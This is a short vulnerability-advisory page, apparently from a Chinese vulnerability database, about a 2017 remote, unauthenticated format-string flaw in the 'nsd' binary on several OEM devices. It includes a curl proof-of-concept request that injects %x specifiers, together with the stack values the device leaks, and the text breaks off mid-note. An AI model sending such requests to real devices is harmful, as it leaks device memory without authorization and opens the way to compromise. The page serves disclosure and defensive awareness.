Remote Stack Format String in...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

Subject: Remote Stack Format String in 'nsd' binary from multiple OEM Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis <mcw noemail eu> (December 2017) PoC: https://github.com/mcw0/PoC Release date: December 14, 2017 Full Disclosure: 0-Day ### PoC 1) ``` $ curl 'http://[IP:PORT]/main/index.asp?ID=AAAA|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x&lg=BBBB' [...] function initHideWidget(){ document.getElementById("devip").value = "192.168.57.20"; document.getElementById("cameraid").value = 1; document.getElementById("streamid").value = 1; document.getElementById("id").value = "AAAA|5e2ff9f8|ffffffff|5e3006db|ea60|1|2|1|1|0|20cd3e0|7263733c|20747069"; document.getElementById("lg").value = "BBBB"; document.getElementById("port").value = 60000; document.getElementById("ipver").value = 1; document.getElementById("tprotocol").value = 2; document.getElementById("devtype").value = 1; document.getElementById("ismotorize").value = 1; [...] ``` Note: 'BBBB' are...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息